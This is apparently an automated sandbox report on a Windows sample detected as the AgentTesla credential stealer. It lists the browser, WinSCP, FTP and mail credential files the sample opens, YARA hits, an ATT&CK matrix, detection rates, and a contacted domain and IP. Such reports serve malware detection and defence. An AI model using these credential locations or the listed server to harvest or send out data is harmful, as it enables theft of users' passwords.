                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.405d6f8.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4097b18.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.405d6f8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4097b18.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.2985192708.00000000031CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2982742539.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1784260103.000000000405D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2985192708.0000000003181000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe PID: 6844, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe PID: 7128, type: MEMORYSTR
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.405d6f8.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4097b18.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.405d6f8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4097b18.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.2982742539.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1784260103.000000000405D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2985192708.0000000003181000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe PID: 6844, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe PID: 7128, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.405d6f8.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4097b18.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.405d6f8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4097b18.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.2985192708.00000000031CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2982742539.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1784260103.000000000405D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2985192708.0000000003181000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe PID: 6844, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe PID: 7128, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		111
                    Process Injection                    		1
                    Masquerading                    		2
                    OS Credential Dumping                    		111
                    Security Software Discovery                    		Remote Services1
                    Email Collection                    		1
                    Encrypted Channel                    		1
                    Exfiltration Over Alternative Protocol                    		Abuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                    DLL Side-Loading                    		1
                    Disable or Modify Tools                    		1
                    Input Capture                    		1
                    Process Discovery                    		Remote Desktop Protocol1
                    Input Capture                    		1
                    Non-Standard Port                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)141
                    Virtualization/Sandbox Evasion                    		1
                    Credentials in Registry                    		141
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin Shares11
                    Archive Collected Data                    		1
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                    Process Injection                    		NTDS1
                    Application Window Discovery                    		Distributed Component Object Model2
                    Data from Local System                    		11
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Deobfuscate/Decode Files or Information                    		LSA Secrets1
                    File and Directory Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                    Obfuscated Files or Information                    		Cached Domain Credentials24
                    System Information Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                    Software Packing                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    DLL Side-Loading                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe29%ReversingLabsWin32.Trojan.Generic
                    SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe39%VirustotalBrowse
                    SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe100%AviraHEUR/AGEN.1309856
                    SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe100%Joe Sandbox ML

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    SourceDetectionScannerLabelLink
                    wapination.net0%VirustotalBrowse
                    ftp.wapination.net1%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    http://www.apache.org/licenses/LICENSE-2.00%URL Reputationsafe
                    http://www.fontbureau.com0%URL Reputationsafe
                    http://www.fontbureau.com/designersG0%URL Reputationsafe
                    http://www.fontbureau.com/designers/?0%URL Reputationsafe
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    https://account.dyn.com/0%URL Reputationsafe
                    http://www.fontbureau.com/designers?0%URL Reputationsafe
                    http://www.tiro.com0%URL Reputationsafe
                    http://www.fontbureau.com/designers0%URL Reputationsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    http://www.carterandcone.coml0%URL Reputationsafe
                    http://www.sajatypeworks.com0%URL Reputationsafe
                    http://www.typography.netD0%URL Reputationsafe
                    http://www.fontbureau.com/designers/cabarga.htmlN0%URL Reputationsafe
                    http://www.fontbureau.com/designers/cabarga.htmlN0%URL Reputationsafe
                    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                    http://www.founder.com.cn/cn0%URL Reputationsafe
                    http://www.fontbureau.com/designers/frere-user.html0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                    http://www.fontbureau.com/designers80%URL Reputationsafe
                    http://www.fontbureau.com/designers80%URL Reputationsafe
                    http://www.fonts.com0%URL Reputationsafe
                    http://www.sandoll.co.kr0%URL Reputationsafe
                    http://www.urwpp.deDPlease0%URL Reputationsafe
                    http://www.zhongyicts.com.cn0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    http://www.sakkal.com0%URL Reputationsafe
                    http://ftp.wapination.net0%Avira URL Cloudsafe
                    http://wapination.net0%Avira URL Cloudsafe
                    http://ftp.wapination.net1%VirustotalBrowse
                    http://wapination.net0%VirustotalBrowse

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    wapination.net
                    		108.179.234.136
                    		truetrueunknown
                    ftp.wapination.net
                    		unknown
                    		unknowntrueunknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.apache.org/licenses/LICENSE-2.0SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1788730235.0000000007A52000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.comSecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1788730235.0000000007A52000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.com/designersGSecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1788730235.0000000007A52000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.com/designers/?SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1788730235.0000000007A52000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://ftp.wapination.netSecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000002.00000002.2985192708.00000000031DC000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000002.00000002.2985192708.00000000031CE000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.founder.com.cn/cn/bTheSecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1788730235.0000000007A52000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://account.dyn.com/SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1784260103.000000000405D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000002.00000002.2982742539.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.com/designers?SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1788730235.0000000007A52000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.tiro.comSecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1788730235.0000000007A52000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.com/designersSecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1788730235.0000000007A52000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.goodfont.co.krSecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1788730235.0000000007A52000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://wapination.netSecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000002.00000002.2985192708.00000000031DC000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.carterandcone.comlSecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1788730235.0000000007A52000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.sajatypeworks.comSecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1788730235.0000000007A52000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.typography.netDSecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1788730235.0000000007A52000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.com/designers/cabarga.htmlNSecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1788730235.0000000007A52000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.founder.com.cn/cn/cTheSecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1788730235.0000000007A52000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
